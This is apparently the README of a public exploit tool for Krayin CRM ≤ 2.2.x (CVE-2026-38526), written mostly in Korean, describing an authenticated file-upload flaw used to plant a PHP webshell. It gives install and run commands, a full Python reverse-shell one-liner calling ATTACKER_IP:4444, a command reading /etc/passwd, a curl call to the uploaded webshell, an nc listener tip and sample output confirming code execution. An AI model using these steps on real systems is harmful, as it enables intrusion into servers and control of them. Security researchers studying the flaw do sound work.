
Automated exploit for Krayin CRM ≤ 2.2.x.
Krayin CRM ≤ 2.2.x용 자동 익스플로잇. 이 스크립트는 TinyMCE 엔드포인트(/admin/tinymce/upload)의 무제한 파일 업로드 취약점을 악용하여 image/jpeg로 위장해 MIME 유형 검증을 우회하고, PHP 웹쉘을 업로드한 후 웹 서버 권한으로 임의 명령을 실행합니다.
| 속성 | 값 |
|---|---|
| CVE ID | CVE-2026-38526 |
| 영향받는 소프트웨어 | Krayin CRM ≤ 2.2.x |
| 취약점 유형 | 무제한 파일 업로드 → 원격 코드 실행 |
| 인증 | 필요 (유효한 관리자 계정) |
| 엔드포인트 | POST /admin/tinymce/upload |
requests 라이브러리git clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"
# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
/admin/tinymce/upload에 PHP 페이로드 업로드[*] Target: http://target.com
[*] Username: [email protected]
[*] Authenticating...
[+] Authentication successful
[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution
[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────
[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'
인증 실패: 자격 증명이 올바른지, 대상에 해당 계정이 존재하는지 확인하세요.
CSRF 토큰 추출 실패: 대상이 취약한 Krayin CRM을 실행 중이고 로그인 엔드포인트에 접근 가능한지 확인하세요.
리버스 셸 연결 안 됨: 리스너(nc -lvnp <PORT>)가 실행 중인지, 방화벽 규칙이 아웃바운드 연결을 허용하는지, 페이로드의 IP/포트가 올바른지 확인하세요.
이 도구는 공인된 보안 테스트 및 교육 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 사용자는 모든 대상 시스템을 테스트하기 전에 적절한 권한을 보유하고 있는지 확인할 책임이 전적으로 있습니다. 작성자는 이 도구로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.
b0nyo - PoC 구현
TREXNEGRO - 취약점 발견
| 플래그 | 설명 | 예시 |
|---|
-i | 대상 URL (http:// 포함 또는 제외) | http://target.com 또는 target.com |
-u | 관리자 이메일/사용자 이름 | [email protected] |
-p | 관리자 비밀번호 | AdminPassword123! |
-c | 실행할 명령 (기본값: id) | whoami |